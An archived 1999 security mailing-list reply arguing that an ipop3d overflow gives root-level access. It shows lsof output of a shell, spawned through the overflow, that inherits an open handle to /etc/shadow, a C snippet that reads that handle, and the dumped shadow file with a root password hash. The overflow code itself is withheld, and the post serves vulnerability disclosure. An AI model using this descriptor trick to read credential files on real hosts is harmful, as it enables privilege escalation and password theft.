Date: Thu, 8 Apr 1999 16:39:30 +0200
From: "M.C.Mar" <[email protected]>
To: [email protected]Subject: Re: ipop3d (x2) / pine (x2) / Linux kernel (x2) / Midnight Commander (x2)
On Tue, 6 Apr 1999, Stefan Rompf wrote:
> Hello Michal,
>
> At 01:41 07.03.99 +0100, you wrote:
>
> >Exploited overflow in ipop3d could be used to gain superuser access (the
> >only thing done by ipop3d is setuid+setgid, no seteuid/setreuid).
>
> Fortunately, you are wrong here. Quoting from the Solaris' setuid() manpage:
>
> If the effective user ID of the process calling setuid() is
> the super-user, the real, effective, and saved user IDs are
> set to the uid parameter.
>
> Linux behaves the same way, IMHO this is defined in POSIX.
>
But, (un)fortunately when exploiting ipop3d I found something like this:
Grabarz:~emsi# lsof -n | grep 1190
sh 1190 emsi cwd DIR 8,1 1024 2 /
sh 1190 emsi rtd DIR 8,1 1024 2 /
sh 1190 emsi txt REG 8,1 279352 16324 /bin/bash
sh 1190 emsi mem REG 8,1 78828 30629 /lib/ld-linux.so.1.9.5
sh 1190 emsi mem REG 8,1 11493 79564 /lib/libtermcap.so.2.0.8
sh 1190 emsi mem REG 8,1 605044 79566 /lib/libc.so.5.4.33
[...]
sh 1190 emsi 3r REG 8,1 598 24674 /etc/shadow
Shel spawned via ipop3d explotation (no bonus -- no exploit core) inherits
opened fd :)
So we may do something like this:
emsi:~emsi# telnet grabarz 110
Trying 192.168.0.19...
Connected to grabarz.
Escape character is '^]'.
+OK Grabarz POP3 3.3(20) w/IMAP2 client (Comments to [email protected]) at Fri, 9 Apr 1999 15:19:33 +0000 ( )
user emsi
+OK User name accepted, password please
pass qpqp01
id;
uid=1002(emsi) gid=100(users) groups=100(users)
: command not found
bash -i;
bash$ cd ~emsi
cd ~emsi
bash$
bash$ cat p.c
cat p.c
char buf[255];
lseek(3,0,0);
read(3,buf,255);
printf("Be my guest:\n%s\n",buf);
}
bash$
bash$ gcc p.c
gcc p.c
bash$
./a.out
Be my guest:
root:csKcGWMEUMGUs:10539:0:::::
halt:*:9797:0:::::
operator:*:9797:0:::::
shutdown:*:9797:0:::::
sync:*:9797:0:::::
bin:*:9797:0:::::
ftp:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
mail:*:9797:0:::::
postmaster:*:9797:0:::::
new¿¤þ^
`
bash$
bash$
That's only example... It proofs that exploiting ipop3d could be usefull
to obtain root (or any other account) access and that the vulnerability
should be fixed.
P.S.
Greetings Lam3rZ Group, 3Kombajd_do_czere¶ni testers and Lcamtuf (ty lamo,
czy wkoñcu pode¶lesz mi ten txt co mi obieca³e¶? ;).
--
___________________________________________________________________________
M.C.Mar An NT server can be run by an idiot, and usually is. [email protected]
"If you can't make it good, make it LOOK good." - Bill Gates
Moze to nie miejsce, ale tak np. programy M$ to swoiste pomniki glupoty.
